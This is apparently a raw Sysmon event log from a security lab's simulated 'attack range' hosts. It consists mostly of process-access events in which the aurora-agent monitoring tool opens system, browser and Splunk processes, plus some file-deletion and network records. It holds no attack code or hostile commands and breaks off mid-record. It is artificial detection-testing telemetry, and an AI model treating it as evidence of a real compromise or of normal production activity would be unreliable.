Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000044278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:51.337{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6875B7BB237F3D0F228A1C4BE7FEC9A5,SHA256=7B8AAD4B9FB675CC2501C27955349E572144085FB321BB34F714E825CC2850BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017017Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:52.410{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A85B6C7FB2251D046D40F70F64C71A26,SHA256=78E64AEF51CAA2ECFBE307B50EF243776F896D8B5397C30D01102D382A356D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:52.389{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE6E00A222D55591E0DD2A44075C3F1A,SHA256=B9C14F28932849257D4E2C1A31C424861AD43508DA2A05215FB3C82EC69FE85D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:52.303{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000017018Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:53.500{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00FBB9CB902362995EA831B2431CBFE2,SHA256=A225EDBC1B5EA01D4DCFB9996A5637B04487CA6058EDE62EA677289C4FB0AE86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:53.468{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5773A1006CE5ABDE0F1E4D659CAE64F1,SHA256=F1A826E439619145BFC6C41A01E12376432C72E72124388AC39FEA0A8A851B30,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000044305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:50.713{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56380-false10.0.1.12-8000- 23542300x800000000000000017019Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:54.591{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=685D6C011DBDC51426F1B7AF9A5CD3D2,SHA256=9C1B6868556BDA39EEF3B4338AC8C38EC9A2E53B4DBE986B66E116E6C97F7C38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.993{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.980{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.972{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.967{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.953{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.952{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.951{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.951{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.949{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.942{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.929{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.905{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.898{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.888{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.874{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.869{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.865{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:54.853{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program 